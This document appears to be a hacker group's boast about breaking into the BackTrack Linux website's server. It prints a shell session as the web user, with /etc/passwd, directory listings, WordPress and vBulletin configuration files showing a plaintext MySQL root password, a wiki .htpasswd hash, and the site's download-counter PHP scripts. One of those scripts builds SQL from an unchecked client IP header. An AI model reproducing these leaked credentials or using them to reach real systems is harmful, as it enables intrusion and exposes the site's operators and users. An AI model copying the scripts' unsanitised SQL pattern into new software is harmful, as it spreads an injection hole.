
Wow! Backtrack Official Website's Server Hacked by Team Injector (1337db)!




Attack on backtrack-linux.org From 1337 Team Injector


  .    .--.   .--.   .---.      .          
.'|        )      )      /      |          
  |     --:    --:      /    .-.| .-.  .  .
  |        )      )    /    (   |(   ) |  |
'---'  `--'   `--'    '      `-'`-`-'`-`--|
                                          ;
                                       `-' 






Since we already tapped into exploit-db and their server lies in the
same subnet with backtrack, we decided to check out their mad
security. Backtrack is run by muts, the same guy who also administers
exploit-db, so no wonder why it was super easy to get a shell...




$ uname -a
Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux


$ id
uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0


$ alias ls="ls -la"


$ ls
total 110
dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 .
dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 ..
-rw-r--r--.   1 root root     0 Dec  7 08:42 .autofsck
drwx------.   2 root root  4096 Dec 10 03:40 backup
dr-xr-xr-x.   2 root root  4096 Nov 29 19:59 bin
dr-xr-xr-x.   5 root root  1024 Dec  7 08:41 boot
drwxr-xr-x.  17 root root  3580 Dec  7 08:43 dev
drwxr-xr-x.  66 root root  4096 Dec  7 08:42 etc
drwxr-xr-x.   3 root root  4096 Aug 14 20:50 home
dr-xr-xr-x.   9 root root  4096 Aug 11 04:01 lib
dr-xr-xr-x.   9 root root 12288 Nov 29 20:00 lib64
drwx------.   2 root root 16384 Aug 11 02:01 lost+found
drwxr-xr-x.   2 root root  4096 Aug 11 04:42 maint
drwxr-xr-x.   2 root root  4096 Aug 25  2009 media
drwxr-xr-x.   2 root root  4096 Aug 25  2009 mnt
drwxr-xr-x.   2 root root  4096 Aug 25  2009 opt
dr-xr-xr-x. 160 root root     0 Dec  7 08:42 proc
drwxr-xr-x.   5 root root  4096 Dec  3 17:16 recovery
dr-xr-x---.   4 root root  4096 Dec 10 08:50 root
dr-xr-xr-x.   2 root root 12288 Nov 29 19:59 sbin
drwxr-xr-x.   7 root root     0 Dec  7 08:42 selinux
drwxr-xr-x.   2 root root  4096 Aug 25  2009 srv
drwxr-xr-x.  13 root root     0 Dec  7 08:42 sys
drwxrwxrwt.   4 root root  4096 Dec 10 14:08 tmp
drwxr-xr-x.  14 root root  4096 Aug 11 02:03 usr
drwxr-xr-x.  20 root root  4096 Aug 14 20:45 var




$ cat /etc/issue
Fedora release 12 (Constantine)
Kernel \r on an \m (\l)


$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin
sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:494:Apache:/var/www:/sbin/nologin
mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash
ossec:x:500:500::/var/ossec:/sbin/nologin
ossecm:x:501:500::/var/ossec:/sbin/nologin
ossecr:x:502:500::/var/ossec:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin


$ cd
/var/www/html/


$ ls
total 90224
drwxr-xr-x. 13 apache apache     4096 Dec  9 12:21 .
drwxr-xr-x.  6 root   root       4096 Aug 18 10:30 ..
-rw-r--r--.  1 apache apache     4183 Dec  5 16:50 .htaccess
-rw-r--r--.  1 apache apache     1156 Aug 11 03:17 HT
-rw-r--r--.  1 apache apache     2233 Aug 11 03:17 HT-ORIG
-rw-r--r--.  1 apache apache  1526525 Nov 11 14:01 IMG_0585.JPG
drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 ads
-rw-r--r--.  1 apache apache   125832 Nov 19 12:18 bootsplash.jpg
-rw-r--r--.  1 apache apache   754444 Aug 11 03:16 bt-nsa.png
-rw-r--r--.  1 apache apache   757498 Aug 11 03:16 bt-nsa2.png
-rw-r--r--.  1 apache apache    81597 Aug 11 03:16 bt4-final-vm.zip.torrent
-rw-r--r--.  1 apache apache    60094 Aug 11 03:16 bt4-final.iso.torrent
-rw-r--r--.  1 apache apache       44 Aug 11 03:16 bt4r1.txt
-rw-r--r--.  1 root   root     686248 Nov 23 10:47 bt4r2.png
-rw-r--r--.  1 apache apache   160728 Aug 11 03:16 btfail.png
-rw-r--r--.  1 apache apache      476 Aug 11 03:16 collapsible_ad.html
-rwxr-xr-x.  1 apache apache 13397784 Aug 11 03:16 d.bin
-rw-r--r--.  1 apache apache      121 Aug 11 03:16 d.lic
-rw-r--r--.  1 apache apache 12844822 Aug 11 03:16 d32.bin
drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 documents
-rw-r--r--.  1 apache apache     3342 Aug 11 03:16 down.php
-rw-r--r--.  1 apache apache     4158 Aug 11 03:16 download-orig.php
-rw-r--r--.  1 apache apache     4945 Nov 22 11:38 download.php
-rw-r--r--.  1 apache apache    15125 Aug 11 03:16 error.php
-rw-r--r--.  1 apache apache   137383 Aug 11 03:16 example-2.jpg
-rw-r--r--.  1 apache apache     1150 Aug 11 03:16 favicon.ico
drwxr-xr-x. 21 apache apache     4096 Nov 22 18:56 forums
-rw-r--r--.  1 apache apache    87176 Aug 11 03:17 google.png
-rw-r--r--.  1 apache apache       53 Aug 11 03:17 googled6c4817aa45e0032.html
-rw-r--r--.  1 apache apache       23 Aug 11 03:17 googlehostedservice.html
-rw-r--r--.  1 apache apache  1978856 Sep 17 08:06 hola.jpg
-rw-r--r--.  1 apache apache  2264271 Sep 17 08:12 hola1.jpg
-rw-r--r--.  1 apache apache  2197361 Sep 17 08:15 hola2.jpg
-rw-r--r--.  1 apache apache   315306 Aug 11 03:17 hola22.png
-rw-r--r--.  1 apache apache   169202 Aug 11 03:17 hola23.png
drwxr-xr-x.  8 apache apache     4096 Nov 21 16:38 images
-rw-r--r--.  1 apache apache        3 Aug 11 03:17 index.html
-rw-r--r--.  1 apache apache      397 Dec  9 12:20 index.php
-rw-r--r--.  1 apache apache   321196 Nov 19 15:06 kanji.png
-rw-r--r--.  1 apache apache   147841 Sep  4 12:37 knock-0.5.tar.gz
-rw-r--r--.  1 apache apache    15410 Dec  9 12:20 license.txt
-rw-r--r--.  1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar
-rw-r--r--.  1 apache apache    13946 Aug 11 03:17 nv-xorg.conf
-rw-r--r--.  1 apache apache  1382400 Oct 26 10:38 oiopub-direct.tar
-rw-r--r--.  1 apache apache  1508471 Aug 11 03:17 p2270016.jpg
-rw-r--r--.  1 apache apache  1636957 Aug 11 03:17 p2280018.jpg
drwxr-xr-x.  2 apache apache     4096 Nov 22 11:46 patches
-rw-r--r--.  1 apache apache      582 Nov 22 11:21 r2.php
-rw-r--r--.  1 apache apache     9120 Dec  9 12:20 readme.html
-rw-r--r--.  1 apache apache      712 Nov 10 22:27 s.php
-rw-r--r--.  1 apache apache       63 Aug 11 03:17 show.dud.php
-rw-r--r--.  1 apache apache      801 Aug 11 03:17 show.original.php
-rw-r--r--.  1 apache apache       31 Aug 11 03:17 show.php
-rw-r--r--.  1 apache apache      601 Nov 10 22:28 show.stats.working.php
-rw-r--r--.  1 apache apache    38971 Dec  7 23:23 sitemap.xml
-rw-r--r--.  1 apache apache     2485 Dec  7 23:23 sitemap.xml.gz
drwxr-xr-x.  3 apache apache     4096 Aug 11 03:17 slider
-rw-r--r--.  1 apache apache   714372 Aug 11 03:17 spot-the-release.png
-rw-r--r--.  1 apache apache     1536 Aug 11 03:17 stats.php
-rw-r--r--.  1 apache apache       33 Dec 10 03:34 stats.txt
-rw-r--r--.  1 apache apache    23660 Aug 11 03:17 style.css
-rw-r--r--.  1 apache apache        5 Aug 11 03:17 test.php
drwxr-xr-x.  2 apache apache     4096 Nov 22 09:22 torrents
drwxr-xr-x. 15 apache apache     4096 Nov 27 16:52 wiki
-rw-r--r--.  1 apache apache     4391 Dec  9 12:20 wp-activate.php
drwxr-xr-x.  8 apache apache     4096 Dec  5 08:12 wp-admin
-rw-r--r--.  1 apache apache    40284 Dec  9 12:20 wp-app.php
-rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-atom.php
-rw-r--r--.  1 apache apache      274 Dec  9 12:20 wp-blog-header.php
-rw-r--r--.  1 apache apache     3926 Dec  9 12:20 wp-comments-post.php
-rw-r--r--.  1 apache apache      238 Dec  9 12:20 wp-commentsrss2.php
-rw-r--r--.  1 apache apache     3173 Dec  9 12:20 wp-config-sample.php
-rw-r--r--.  1 apache apache     2696 Nov 22 19:32 wp-config.php
drwxr-xr-x.  9 apache apache     4096 Dec  9 12:21 wp-content
-rw-r--r--.  1 apache apache     1255 Dec  9 12:20 wp-cron.php
-rw-r--r--.  1 apache apache      240 Dec  9 12:20 wp-feed.php
drwxr-xr-x.  8 apache apache     4096 Aug 13 20:06 wp-includes
-rw-r--r--.  1 apache apache     2002 Dec  9 12:20 wp-links-opml.php
-rw-r--r--.  1 apache apache     2441 Dec  9 12:20 wp-load.php
-rw-r--r--.  1 apache apache    26059 Dec  9 12:20 wp-login.php
-rw-r--r--.  1 apache apache     7774 Dec  9 12:20 wp-mail.php
-rw-r--r--.  1 apache apache      487 Dec  9 12:20 wp-pass.php
-rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rdf.php
-rw-r--r--.  1 apache apache      316 Dec  9 12:20 wp-register.php
-rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rss.php
-rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-rss2.php
-rw-r--r--.  1 apache apache     9177 Dec  9 12:20 wp-settings.php
-rw-r--r--.  1 apache apache    18695 Dec  9 12:20 wp-signup.php
-rw-r--r--.  1 apache apache     3702 Dec  9 12:20 wp-trackback.php
-rw-r--r--.  1 root   root      99665 Nov 24 00:52 wtfff.png
-rw-r--r--.  1 apache apache       85 Nov 20 13:43 x.gif
-rw-r--r--.  1 apache apache    95481 Dec  9 12:20 xmlrpc.php


$ cat wp-config.php
<?php
/** Enable W3 Total Cache **/
define('WP_CACHE', true); // Added by W3 Total Cache


/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');


/** MySQL database username */
define('DB_USER', 'root');


/** MySQL database password */
define('DB_PASSWORD', '234hi2u3d98as7d23kuh');


/** MySQL hostname */
define('DB_HOST', 'localhost');


/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');


/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');


/**#@+
 * Authentication Unique Keys.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
/**#@-*/


/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';


/**
 * WordPress Localized Language, defaults to English.
 *
 * Change this to localize WordPress.  A corresponding MO file for the chosen
 * language must be installed to wp-content/languages. For example, install
 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
 * language support.
 */
define ('WPLANG', '');


/* That's all, stop editing! Happy blogging. */


/** WordPress absolute path to the Wordpress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');


$ cat show.php
<?php
include 'stats.txt';
?>
$ cat stats.txt
BackTrack 4 - 4916323 downloads


$ cat download.php
<?php


// DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!


function getRealIpAddr()
{
    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
    {
      $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
    {
      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
      $ip=$_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}


$ip=getRealIpAddr();


$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";


function choose($iso)
{


 $num = Rand (1,5);
 switch ($num)
 {
  case 1:
  $link="ftp://ftp.uio.no/pub/security/backtrack/$iso";
  break;


  case 2:
  $link="http://ftp.uio.no/pub/security/backtrack/$iso";
  break;


  case 3:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;


  case 4:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;


  case 5:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;


//  case 6:
//  $link="http://moon.backtrack-linux.org/downloads/$iso";
//  break;




 }




return $link;


}




$version=$_GET["fname"];


if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm")))


{
 echo "This page cannot be accessed directly.";
 exit;
}


if ($version=="bt4r2")
{


        $iso="bt4-r2.iso";
        $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


        header( "Location: $link ");
        exit;
}




if ($version=="bt4r2vm")
{


        $iso="bt4-r2-vm.tar.bz2";
        $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


        header( "Location: $link ");
        exit;
}






if ($version=="bt4f")
{


 $iso="bt4-final.iso";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4fvm")
{
 $iso="bt4-final-vm.zip";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4r1")
{
 $iso="bt4-r1.iso";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4r1vm")
{
 $iso="bt4-r1-vm.tar.bz2";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4pf")
{
 $iso="bt4-pre-final.iso";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4b")
{
 $iso="bt4-beta.iso";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4bvm")
{
 $iso="bt4-beta-vm-6.5.1.rar";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}


elseif ($version=="bt3")
{
 $iso="bt3-final.iso";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}


else
{
 exit;
}


?>




$ cat s.php
<?php




$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";






mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4f\"";
$query2 = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4fvm\"";
$result=mysql_query($query);
$result2=mysql_query($query2);
$row2 = mysql_fetch_array($result2, MYSQL_ASSOC);
$row = mysql_fetch_array($result, MYSQL_ASSOC);
$numrows1 = $row['numrows'];
$numrows2 = $row2['numrows'];
mysql_close();


$total= round(($numrows1 + $numrows2) * 1.4);


echo "BackTrack 4 Final - $total unique downloads";


?>


$ cd wiki


$ ls


total 700
drwxr-xr-x. 15 apache apache   4096 Nov 27 16:52 .
drwxr-xr-x. 13 apache apache   4096 Dec  9 12:21 ..
-rw-r--r--.  1 apache apache     23 Nov 14 16:01 .htpasswd
-rw-r--r--.  1 apache apache  17997 Apr  5  2006 COPYING
-rw-r--r--.  1 apache apache   2073 Jul 27 07:29 CREDITS
-rw-r--r--.  1 apache apache     76 Jul 27  2009 FAQ
-rw-r--r--.  1 apache apache 392287 Mar 12  2010 HISTORY
-rw-r--r--.  1 apache apache     96 Nov 14 16:01 HT
-rw-r--r--.  1 apache apache   4138 Apr 18  2008 INSTALL
-rw-r--r--.  1 apache apache   5469 Nov 28 16:45 LocalSettings.php
-rw-r--r--.  1 apache apache   3649 Nov 11  2008 README
-rw-r--r--.  1 apache apache  58431 Jul 28 03:11 RELEASE-NOTES
-rw-r--r--.  1 apache apache    648 May  7  2009 StartProfiler.sample
-rw-r--r--.  1 apache apache  13307 Mar 25  2010 UPGRADE
drwxr-xr-x.  2 root   root     4096 Nov 27 16:53 adsense
-rw-r--r--.  1 apache apache   4707 Feb 15  2010 api.php
-rw-r--r--.  1 apache apache     25 Feb  3  2008 api.php5
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 bin
-rw-r--r--.  1 apache apache   8436 Nov 21 14:24 bt-wiki.png
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 cache
drwxr-xr-x.  2 apache apache   4096 Nov 14 15:58 config
drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 docs
drwxr-xr-x.  4 apache apache   4096 Nov 28 16:44 extensions
drwxr-xr-x. 12 apache apache   4096 Nov 23 12:36 images
-rw-r--r--.  1 apache apache   4031 Oct 14  2009 img_auth.php
-rw-r--r--.  1 apache apache     31 Feb  3  2008 img_auth.php5
drwxr-xr-x. 16 apache apache   4096 Jul 28 03:16 includes
-rw-r--r--.  1 apache apache   4329 Jan  1  2010 index.php
-rw-r--r--.  1 apache apache     28 Feb  3  2008 index.php5
drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 languages
drwxr-xr-x. 13 apache apache  12288 Nov 22 12:55 maintenance
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 math
-rw-r--r--.  1 apache apache   3054 Mar 21  2009 opensearch_desc.php
-rw-r--r--.  1 apache apache     39 Mar  3  2008 opensearch_desc.php5
-rw-r--r--.  1 apache apache    174 Feb  3  2010 php5.php5
-rw-r--r--.  1 apache apache   8821 Jul 27 03:40 profileinfo.php
-rw-r--r--.  1 apache apache    383 Mar 21  2009 redirect.php
-rw-r--r--.  1 apache apache     31 Feb  3  2008 redirect.php5
-rw-r--r--.  1 apache apache     89 Feb  3  2010 redirect.phtml
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 serialized
-rwxrwxrwx.  1 root   root     6816 Nov 23 18:29 sitemap.xml
drwxr-xr-x.  9 apache apache   4096 Nov 28 14:12 skins
-rw-r--r--.  1 apache apache   4905 Mar  8  2010 thumb.php
-rw-r--r--.  1 apache apache     29 Feb  3  2008 thumb.php5
-rw-r--r--.  1 apache apache   1347 Nov  5  2008 trackback.php
-rw-r--r--.  1 apache apache     32 Mar 16  2009 trackback.php5
-rw-r--r--.  1 apache apache     86 Feb  3  2010 wiki.phtml


$ cat .htpasswd
edbadmin:YE8mle4nG1Z.c


$ cd ..
$ cat forums/includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.0 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/


/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/


 // ****** DATABASE TYPE ******
 // This is the type of the database server on which your vBulletin database will be located.
 // Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
 // for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';


 // ****** DATABASE NAME ******
 // This is the name of the database where your vBulletin will be located.
 // This must be created by your webhost.
$config['Database']['dbname'] = 'forums';


 // ****** TABLE PREFIX ******
 // Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';


 // ****** TECHNICAL EMAIL ADDRESS ******
 // If any database errors occur, they will be emailed to the address specified here.
 // Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'muts@offsec.com';


 // ****** FORCE EMPTY SQL MODE ******
 // New versions of MySQL (4.1+) have introduced some behaviors that are
 // incompatible with vBulletin. Setting this value to "true" disables those
 // behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;






 // ****** MASTER DATABASE SERVER NAME AND PORT ******
 // This is the hostname or IP address and port of the database server.
 // If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;


 // ****** MASTER DATABASE USERNAME & PASSWORD ******
 // This is the username and password you use to access MySQL.
 // These must be obtained through your webhost.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = '234hi2u3d98as7d23kuh';


 // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
 // This option allows you to turn persistent connections to MySQL on or off.
 // The difference in performance is negligible for all but the largest boards.
 // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;






 // ****** SLAVE DATABASE CONFIGURATION ******
 // If you have multiple database backends, this is the information for your slave
 // server. If you are not 100% sure you need to fill in this information,
 // do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;






 // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
 // This setting allows you to change the name of the folders that the admin and
 // moderator control panels reside in. You may wish to do this for security purposes.
 // Please note that if you change the name of the directory here, you will still need
 // to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincphaha';
$config['Misc']['modcpdir'] = 'modcphaha';


 // Prefix that all vBulletin cookies will have
 // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';


 // ******** FULL PATH TO FORUMS DIRECTORY ******
 // On a few systems it may be necessary to input the full path to your forums directory
 // for vBulletin to function normally. You can ignore this setting unless vBulletin
 // tells you to fill this in. Do not include a trailing slash!
 // Example Unix:
 //   $config['Misc']['forumpath'] = '/home/users/public_html/forums';
 // Example Win32:
 //   $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';






 // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
 // The users specified here will be allowed to view the admin log in the control panel.
 // Users must be specified by *ID number* here. To obtain a user's ID number,
 // view their profile via the control panel. If this is a new installation, leave
 // the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';


 // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
 // The users specified here will be allowed to remove ("prune") entries from the admin
 // log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';


 // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
 // The users specified here will be allowed to run queries from the control panel.
 // See the above entries for more information on the format.
 // Please note that the ability to run queries is quite powerful. You may wish
 // to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';


 // ****** UNDELETABLE / UNALTERABLE USERS ******
 // The users specified here will not be deletable or alterable from the control panel by any users.
 // To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';


 // ****** SUPER ADMINISTRATORS ******
 // The users specified below will have permission to access the administrator permissions
 // page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1,2';


 // ****** DATASTORE CACHE CONFIGURATION *****
 // Here you can configure different methods for caching datastore items.
 // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
 // vB_Datastore_APC - to use APC
 // vB_Datastore_XCache - to use XCache
 // vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';


 // ******** DATASTORE PREFIX ******
 // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
 // than one set of forums installed on your host, you *may* need to use a prefix
 // so that they do not try to use the same variable within the cache.
 // This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';


 // It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i]   = '127.0.0.1';
$config['Misc']['memcacheport'][$i]      = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i]   = 1;
$config['Misc']['memcachetimeout'][$i]   = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/


// ****** The following options are only needed in special cases ******


 // ****** MySQLI OPTIONS *****
 // When using MySQL 4.1+, MySQLi should be used to connect to the database.
 // If you need to set the default connection charset because your database
 // is using a charset other than latin1, you can set the charset here.
 // If you don't set the charset to be the same as your database, you
 // may receive collation errors.  Ignore this setting unless you
 // are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';


 // Optionally, PHP can be instructed to set connection parameters by reading from the
 // file named in 'ini_file'. Please use a full path to the file.
 // Example:
 // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';


// Image Processing Options
 // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;


/*======================================================================*\
|| ####################################################################
|| # Downloaded: 22:25, Sat Jan 9th 2010
|| # CVS: $RCSfile$ - $Revision: 32878 $
|| ####################################################################
\*======================================================================*/


happY 1337day ;)